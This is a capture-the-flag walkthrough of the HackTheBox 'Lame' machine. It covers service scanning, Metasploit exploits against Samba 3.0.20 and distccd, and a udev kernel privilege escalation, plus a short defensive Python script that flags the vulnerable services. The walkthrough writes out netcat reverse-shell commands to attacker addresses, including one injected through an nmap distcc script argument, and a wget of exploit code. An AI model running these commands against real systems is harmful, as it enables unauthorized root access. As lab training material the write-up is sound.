This is an Easy box from HTB Labs. Lame is running multiple vulnerable services through which you can get access to the system. Let's start cracking!!!

Enumeration

Nmap Scanning Results

Command: nmap -sV -A 10.10.10.3
- No UDP ports
- TCP port scan

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

Host script results:
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|_  Workgroup: WORKGROUP\x00

Exploit Searching

So distccd 4.2.4 and Samba 3.0.20 are running on the remote machine. A quick search on Metasploit and Google showed that both services are vulnerable, with public exploits available.

URL: https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script
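To make this triage step repeatable, here is an added example (not part of the original writeup) that parses nmap's port table and flags the services the writeup ties to public exploits (Samba 3.0.20 usermap_script, distcc CVE-2004-2687) plus the anonymous-FTP result, so a defender can list what to patch or firewall first. The scan text is a constructed sample re-typed from the output above; the finding tables and function names are my own.

```python
import re
# Constructed sample: the nmap -sV port table from the scan above, re-typed in
# nmap's normal output layout so the parser below has input to run on.
SAMPLE_SCAN = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# Banner substrings the writeup ties to public exploits (Samba usermap_script,
# distcc CVE-2004-2687) and the anonymous-FTP NSE result it reports.
BANNER_FINDINGS = {
    "Samba smbd 3.0.20": "Samba usermap_script command execution",
    "distccd": "distcc remote command execution (CVE-2004-2687)",
}
SCRIPT_FINDINGS = {"Anonymous FTP login allowed": "anonymous FTP login enabled"}

def parse_nmap(text):
    """Parse nmap's port table into dicts; '|' NSE lines attach to the prior port."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, name, version = m.groups()
            services.append({"port": int(port), "proto": proto, "state": state,
                             "name": name, "version": version, "scripts": []})
        elif line.startswith("|") and services:
            services[-1]["scripts"].append(line.lstrip("|_ ").strip())
    return services

def triage(services):
    """Return (port, reason) pairs for open services matching a known finding."""
    findings = []
    for svc in services:
        if svc["state"] != "open":
            continue
        for needle, reason in BANNER_FINDINGS.items():
            if needle in svc["version"]:
                findings.append((svc["port"], reason))
        for out in svc["scripts"]:
            for needle, reason in SCRIPT_FINDINGS.items():
                if needle in out:
                    findings.append((svc["port"], reason))
    return findings
```

Running `triage(parse_nmap(SAMPLE_SCAN))` lists ports 21, 445 and 3632 with their reasons; the 139 entry is skipped because its banner only says "3.X - 4.X".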

Exploitation (with Metasploit)

Samba

The Metasploit Samba Command Execution module is the first exploit I chose to go with. I know there is an auxiliary script to confirm this vulnerability, but who wants to run that on a test machine? Still, it is worth trying those scripts to see what they report. Start Metasploit and run the exploit.
Yaay!! We got the access as root user!!

distccd

I was curious about this service from the start and wanted to dig more. A distccd module is also available in Metasploit, so let's exploit it. It worked, but we got a limited shell, meaning we are in as the daemon service user rather than as root or a standard user. Let's find a way to escalate privileges.

Privilege Escalation

Run COMMAND: uname -a to find out the Linux kernel and OS version running on the machine. The remote server kernel was found to be vulnerable: linux 2.6.24-16-server. Now download the exploit to the local machine:

COMMAND: wget http://www.exploit-db.com/download/8572

Move it to "/var/www/html" and change the permissions. Start the Apache web server on your local attacking machine:

COMMAND: service apache2 start

Download the exploit into the remote machine's /tmp folder and compile 8572.c:

COMMAND: gcc 8572.c -o exploit

Now we need to create a file named "run" in /tmp, as the exploit executes the "run" file.

COMMANDS:
echo '#!/bin/bash' > run
echo '/bin/netcat -e /bin/bash 10.10.10.15 1234' >> run

Execute the command below to find the PID of udevd:

COMMAND: cat /proc/net/netlink

Start a listener on the local machine.

Then execute the exploit with the PID of udevd.

Got r00t!!!!

Exploitation (Without Metasploit)

The distcc service can also be exploited without Metasploit by using an Nmap script. To test it, first run:

COMMAND: nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687.nse --script-args="distcc-cve2004-2687.cmd='id'"

We got the uid and gid info back, meaning the script is working. Now we can go ahead and get a root shell:

COMMAND: nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687.nse --script-args="distcc-cve2004-2687.cmd='nc -e /bin/sh 10.10.15.102 1234'"

Now grab the flags. This was an easy box, and the privilege escalation part was the interesting bit here.